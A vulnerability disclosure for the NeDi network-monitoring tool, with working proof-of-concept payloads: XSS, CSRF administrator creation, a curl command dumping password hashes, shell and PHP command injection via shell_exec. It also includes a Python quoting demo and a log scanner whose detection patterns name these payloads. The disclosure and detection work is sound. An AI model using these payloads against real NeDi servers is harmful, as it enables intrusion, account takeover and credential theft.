Vulnerability Disclosure

Multiple critical vulnerabilities found in NeDi

Product: NeDi
Vendor: NeDi Consulting GmbH
Version: <= 1.7C
Found: 2018-10-24
By: Oscar Arnflo
oscar@sakerhetskontoret.com

Summary

Several critical vulnerabilities have been found in NeDi versions <= 1.7C.
The most severe gives any remote authenticated user full OS code execution (see 5.3).
By chaining several of the issues (the reflected XSS in 1, the CSRF in 3 and the
code execution in 5) a remote unauthenticated attacker can also gain full OS code
execution on the server.
                

Product description

"NeDi discovers your network devices and tracks connected end-nodes. It 
contains many additional features for
managing enterprise networks:

* Intelligent topology awareness
* MAC address mapping/tracking
* Traffic, error, discard and broadcast graphing with threshold based alerting
* Uptime, BGP peer and interface status monitoring
* Correlate syslog messages and traps with discovery events
* Network maps for documentation and monitoring dashboards
* Detect rogue access points and find missing devices
* Extensive reporting ranging from devices, modules, interfaces all the way to
  assets and nodes"

https://www.nedi.ch/
                

Vulnerability description

1. XSS Reflected

The endpoint /mh.php suffers from a reflected XSS vulnerability in the GET parameter reg.
This allows an UNAUTHENTICATED attacker to execute script in the victim's browser.
If the victim is an authenticated user, the attacker can use this to escalate
privileges (see point 3) and obtain code execution (see 5).

PoC:
    /mh.php?reg=%3Cimg%20src=%22%22%20onerror=%22alert(%27XSS%27);%22%3E
    (Verified in Firefox)
    
    
    
Also verified against version 1.8 DEMO:
http://95.143.60.30/mh.php?reg=%3Cimg%20src=%22%22%20onerror=%22alert(%27XSS%27);%22%3E
                

2. XSS Stored

The endpoint /User-Chat.php suffers from a stored XSS vulnerability.
By posting a message containing a link it is possible to inject extra attributes into
the a-tag that the server side generates for the link, so the payload fires for every
user who views the chat.

PoC:
   This message will trigger XSS when the victim hovers over the hyperlink: 
    Check out my website: http://google.se"onmouseover="alert('XSS')
    
    
    

Affected source code:
   User-Chat.php, Line 73.
                

3. CSRF Privilege escalation

The endpoint User-Management.php does not protect against CSRF, and performs state
changes on GET requests. This makes it possible for an attacker to get a high-privileged
user to create and elevate a new user, either by sending a link or via the XSS
issues above (see 1 and 2).

PoC:
    If a high-privileged user visits this URL, a new user "test" with password "test"
    will be created:
       /User-Management.php?grp=&ord=&usr=test&eml=&phn=&add=Add

    And this would give the user test admin privileges:
       /User-Management.php?grp=&ord=&usr=test&gup=1

    Placing this markup on an attacker-controlled web page makes any NeDi user with
    administrative privileges who loads the page create the new user and elevate it
    to administrator:
        <img src="http://nedi-host/User-Management.php?grp=&ord=&usr=test&eml=&phn=&add=Add">
        <img src="http://nedi-host/User-Management.php?grp=&ord=&usr=test&gup=1">

Affected source code:
    User-Management.php
                

4. SQL Injection / Arbitrary read from database

The endpoint query.php lets ANY user with valid credentials, regardless of privilege
level, read arbitrary tables from the database by naming the table in the t parameter.
This makes it possible for an attacker to steal password hashes, etc.

PoC:
    Fetch all users' password hashes with the user test:test :
    curl -k -d "u=test&p=test&t=users" "https://192.168.219.104/query.php"

    OUTPUT (prettified & truncated):
        [
           {
              "sysname":"Linux",
              "nodename":"ubuntu",
              "release":"4.4.0-131-generic",
              "version":"#157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018",
              "machine":"x86_64",
              "nedi":"1.7.090"
           },
           {
              "usrname":"admin",
              "password":"3cac26b5bd6addd1ba4f9c96a58ff8c2c2c8ac15018f61240f150a4a968b8562",
              "groups":"255",
              "email":"",
              "phone":"",
              "time":"1540356294",
              "lastlogin":"1540372827",
              "comment":"default admin",
              "language":"english",
              "theme":"default",
              "volume":"75",
              "columns":"8",
              "msglimit":"10",
              "miscopts":"35",
              "dateformat":"j.M y G:i470",
              "viewdev":""
           },...
        ]

Affected source code:
    query.php
                

5. Code Execution

Multiple endpoints were found vulnerable to command injection, giving full OS code execution
to a low-privileged authenticated user.

ALSO NOTE that the following endpoints are also vulnerable to CSRF (the injected parameter
travels in a GET request), which means that in a worst-case scenario an UNAUTHENTICATED
attacker who gets an authenticated victim to open a link obtains full OS code execution.
                
5.1 Helpdesk User
 The endpoint /Nodes-Traffic.php and its GET parameter flt are vulnerable to command injection,
 giving users of type "Helpdesk" OS code execution. The payload closes the single-quoted
 shell argument, appends a command and comments out the rest of the line.

 PoC:
    /Nodes-Traffic.php?in%5B%5D=&ord=byt&flt=%27%3Bid%3B%23&stt=10%2F24%2F2018+07%3A15&dur=5&lir=10&cha=&tis=0&tie=0&sho=Show
    
    
    

 Affected source code:
    Nodes-Traffic.php, line 424.
                
5.2 Network User
 The endpoint /Devices-Graph.php and its GET parameter dv are vulnerable to command injection,
 giving users of type "Network" OS code execution. The payload closes the double-quoted
 shell argument in the same way as in 5.1.
 
 PoC:
    /Devices-Graph.php?stt=10%2F19%2F2018+09%3A20&dur=7200&sze=&mon=&sho=Show&cad=1&dv=%22;id;%23
    
    
    


 Affected source code:
    Devices-Graph.php, line 210.
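 To make the quote break-out used in 5.1 and 5.2 concrete, the following is an added
 Python example, not code from this advisory or from NeDi (NeDi is PHP, where the
 equivalent fix is escapeshellarg()). It builds the same kind of quoted shell argument
 two ways and runs both through /bin/sh. The payload mirrors the flt/dv PoC values with
 "id" swapped for "echo injected" so the demonstration has no side effect; the
 function names are this example's own.

```python
import shlex
import subprocess

# A value under attacker control in the same way as flt (5.1) and dv (5.2).
# The leading ' closes the quoted argument, ';' starts a new command and
# '#' comments out whatever the script appended after the value.
PAYLOAD = "';echo injected;#"


def naive_command(value: str) -> str:
    """Interpolate the value into a single-quoted argument: the vulnerable
    pattern. Any ' in the value ends the quoting early."""
    return f"printf '%s\\n' '{value}'"


def safe_command(value: str) -> str:
    """Quote with shlex.quote (the analogue of PHP's escapeshellarg), so the
    whole value stays one argument no matter which characters it contains."""
    return f"printf '%s\\n' {shlex.quote(value)}"


def run(cmd: str) -> str:
    """Run the command line through /bin/sh, as PHP's shell_exec()/exec() do,
    and return its stdout."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def demo(value: str = PAYLOAD):
    """Return (naive output, safe output) for the same value."""
    return run(naive_command(value)), run(safe_command(value))


if __name__ == "__main__":
    naive, safe = demo()
    print("naive :", repr(naive))   # the injected echo runs
    print("quoted:", repr(safe))    # the payload is printed back as plain text
```

 In the naive variant the shell sees three statements (an empty printf, the injected
 echo, and a comment); in the quoted variant it sees one printf with a single odd-looking
 argument, which is exactly what escapeshellarg() achieves for the PHP code paths
 referenced above.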
                
5.3 ANY Authenticated User
 The endpoint /drawmap.php and its GET parameter tit are vulnerable to PHP code injection,
 allowing ANY authenticated user, regardless of group, to run arbitrary PHP code and thus
 also obtain OS code execution on the server. The PoC below injects a call to shell_exec()
 whose argument is taken from a second GET parameter, cmd.
 
 PoC:
    /drawmap.php?cmd=id&tit=%22.shell_exec($_GET[%27cmd%27]),$black);+//
    
    
    

 Affected source code:
    drawmap.php, line 108
    inc/libmap.php, line 88 & line 92
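
As an added example, not part of this advisory or of NeDi, the following Python script
scans web-server access logs in the Apache/nginx "combined" format for the request shapes
used in the PoCs of sections 1, 3, 4, 5.1, 5.2 and 5.3 above. The log lines, the rule
patterns, the host and IP addresses and the function names are constructed for the
demonstration. The stored XSS (2) and the curl PoC for query.php (4) carry their
parameters in a POST body, which access logs do not record, so those require
application-level logging; the query.php rule here only catches the table name when it
is passed in the query string.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" log format (constructed regex; adapt to your log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicators derived from the PoC payloads in this advisory (assumed patterns,
# not vendor-supplied signatures).
SHELL_META = re.compile(r"[;|&`\n]|\$\(")                    # 5.1 / 5.2: ';id;#
PHP_INJECT = re.compile(                                       # 5.3: ".shell_exec($_GET['cmd'])
    r"\$_(GET|POST|REQUEST|COOKIE)|shell_exec|passthru|proc_open|popen"
    r"|\bsystem\s*\(|\bexec\s*\(|\beval\s*\(", re.I)
XSS_MARKUP = re.compile(r"<\s*[a-z!/]|\bon[a-z]+\s*=|javascript:", re.I)  # 1: <img onerror=...>
ANY_VALUE = re.compile(r".")

# (endpoint suffix, parameter, pattern over the decoded value, finding)
RULES = [
    ("/mh.php", "reg", XSS_MARKUP, "1 reflected XSS in reg"),
    ("/user-management.php", "add", ANY_VALUE, "3 user creation over GET (CSRF-able)"),
    ("/user-management.php", "gup", ANY_VALUE, "3 privilege change over GET (CSRF-able)"),
    ("/query.php", "t", re.compile(r"^users$", re.I), "4 users table requested via query.php"),
    ("/nodes-traffic.php", "flt", SHELL_META, "5.1 command injection in flt"),
    ("/devices-graph.php", "dv", SHELL_META, "5.2 command injection in dv"),
    ("/drawmap.php", "tit", PHP_INJECT, "5.3 PHP code injection in tit"),
]


def parse_query(query: str) -> dict:
    """Split a raw query string on '&' only and percent-decode both sides.
    Hand-rolled instead of urllib.parse.parse_qs because older Python releases
    also split on ';', which would hide the ';id;' inside the 5.1/5.2 payloads."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def scan_line(line: str) -> list:
    """Return one hit dict per (rule, parameter value) match in a log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    path = parts.path.lower()          # NeDi file names are mixed case
    params = parse_query(parts.query)
    hits = []
    for endpoint, param, pattern, finding in RULES:
        if not path.endswith(endpoint):
            continue
        for value in params.get(param, []):
            if pattern.search(value):
                hits.append({"finding": finding, "ip": m["ip"], "time": m["ts"],
                             "method": m["method"], "param": param,
                             "value": value, "referer": m["referer"]})
    return hits


def scan_log(lines) -> list:
    return [hit for line in lines for hit in scan_line(line)]


# Constructed sample: four PoC requests from this advisory plus one benign graph request.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Oct/2018:07:15:02 +0200] "GET /Nodes-Traffic.php?in%5B%5D=&ord=byt&flt=%27%3Bid%3B%23&stt=10%2F24%2F2018+07%3A15&dur=5&lir=10&cha=&tis=0&tie=0&sho=Show HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [24/Oct/2018:07:16:10 +0200] "GET /drawmap.php?cmd=id&tit=%22.shell_exec($_GET[%27cmd%27]),$black);+// HTTP/1.1" 200 844 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [24/Oct/2018:07:20:31 +0200] "GET /User-Management.php?grp=&ord=&usr=test&gup=1 HTTP/1.1" 200 2210 "http://attacker.example/" "Mozilla/5.0"',
    '198.51.100.9 - - [24/Oct/2018:07:21:00 +0200] "GET /mh.php?reg=%3Cimg%20src=%22%22%20onerror=%22alert(%27XSS%27);%22%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [24/Oct/2018:07:22:45 +0200] "GET /Devices-Graph.php?stt=10%2F19%2F2018+09%3A20&dur=7200&sze=&mon=&sho=Show&cad=1&dv=switch01 HTTP/1.1" 200 9001 "https://nedi.example/Devices-Graph.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["finding"]}: '
              f'{hit["param"]}={hit["value"]!r} referer={hit["referer"]}')
```

The User-Management.php rules will also fire on legitimate administrator actions, since
the application itself submits those changes over GET; the Referer carried in each hit
(off-site or absent for the CSRF PoC, the NeDi host for a genuine form submission) is the
first thing to look at when triaging them.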